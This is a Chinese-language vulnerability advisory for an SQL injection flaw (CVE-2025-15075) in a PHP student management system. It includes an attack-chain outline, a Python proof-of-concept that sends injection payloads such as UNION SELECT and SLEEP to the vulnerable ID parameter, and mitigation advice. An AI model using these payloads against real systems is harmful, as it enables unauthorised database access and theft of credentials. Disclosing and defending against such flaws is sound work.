CVE-2025-15075 itsourcecode学生管理系统student_p.php文件ID参数SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15075

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Student Management System 1.0

漏洞概述

CVE-2025-15075是itsourcecode Student Management System 1.0版本中发现的一个高危安全漏洞。该漏洞存在于student_p.php文件的ID参数处理逻辑中，由于对用户输入的ID参数缺乏有效的安全过滤和SQL语句预编译处理，导致攻击者可以通过构造恶意的SQL payloads实现SQL注入攻击。此漏洞被评定为CVSS 7.3分，属于高危级别，攻击复杂度低且无需认证即可远程利用。攻击者无需任何用户交互即可发起攻击，成功利用此漏洞可获取数据库中的敏感信息，包括用户账户、密码哈希、个人隐私数据等。在某些配置下，攻击者甚至可能通过SQL注入获取服务器操作系统级别的命令执行权限。该漏洞的利用代码已被公开发布，对使用该系统的教育机构和企业构成严重安全威胁。

技术细节

该SQL注入漏洞位于itsourcecode Student Management System的student_p.php文件中的ID参数处理部分。系统在后端处理HTTP请求时，直接将用户提交的ID参数拼接到SQL查询语句中，未进行输入验证或使用参数化查询（Prepared Statements）。攻击者可通过HTTP GET/POST请求向student_p.php文件提交包含SQL注入payload的ID参数，例如使用UNION SELECT、布尔盲注或时间盲注等技术来提取数据库信息。由于该应用使用PHP编写且可能连接MySQL数据库，攻击者可以利用UNION注入获取数据库版本、当前用户、表名、字段名等敏感信息。典型的利用方式是在ID参数后附加如' UNION SELECT 1,2,3,4,5--等payload来测试漏洞存在性，并通过逐步构建更复杂的查询语句来枚举数据库内容。此漏洞影响所有使用该系统的默认配置环境。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统，发现使用itsourcecode Student Management System 1.0

STEP 2

步骤2

访问student_p.php文件，测试ID参数是否存在SQL注入漏洞

STEP 3

步骤3

使用UNION SELECT或盲注技术构造恶意SQL payload

STEP 4

步骤4

通过HTTP请求发送payload，绕过前端过滤获取数据库响应

STEP 5

步骤5

枚举数据库结构，获取用户表、密码字段等敏感信息

STEP 6

步骤6

提取管理员账户凭证或敏感业务数据

STEP 7

步骤7

进一步利用获取的信息进行横向移动或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15075 SQL Injection PoC
# Target: itsourcecode Student Management System 1.0
# File: student_p.php
# Parameter: ID

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in student_p.php ID parameter
    """
    # Construct the vulnerable URL
    vuln_url = f"{target_url}/student_p.php?id={payload}"
    
    try:
        response = requests.get(vuln_url, timeout=10)
        return response.status_code, response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None, None

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15075.py <target_url>")
        print("Example: python cve-2025-15075.py http://target.com/student_p.php")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    # Test payloads
    payloads = [
        "1' OR '1'='1",  # Basic injection test
        "1' UNION SELECT 1,2,3,4,5--",  # Union-based injection
        "1' AND SLEEP(5)--",  # Time-based blind injection
    ]
    
    print(f"[*] Testing CVE-2025-15075 SQL Injection on {target}")
    print("=" * 60)
    
    for i, payload in enumerate(payloads, 1):
        print(f"\n[*] Testing payload {i}: {payload}")
        status, response = exploit_sqli(target, payload)
        if status:
            print(f"[+] Status Code: {status}")
            if len(response) > 100:
                print(f"[+] Response length: {len(response)} bytes")

if __name__ == "__main__":
    main()

影响范围

itsourcecode Student Management System 1.0

防御指南

临时缓解措施

立即停止使用受影响版本或限制对student_p.php文件的访问；部署Web应用防火墙规则拦截包含SQL特殊字符的请求；对ID参数实施严格的白名单验证；临时解决方案可考虑使用URL过滤模块阻止明显的SQL注入模式。建议尽快升级到厂商发布的安全版本或寻找替代方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15075
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15075
3 Details https://www.cvedetails.com/cve/CVE-2025-15075/
4 VulDB https://vuldb.com/cve/CVE-2025-15075
5 Link https://github.com/ltranquility/CVE/issues/30
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.338332
8 Link https://vuldb.com/?id.338332
9 Link https://vuldb.com/?submit.721406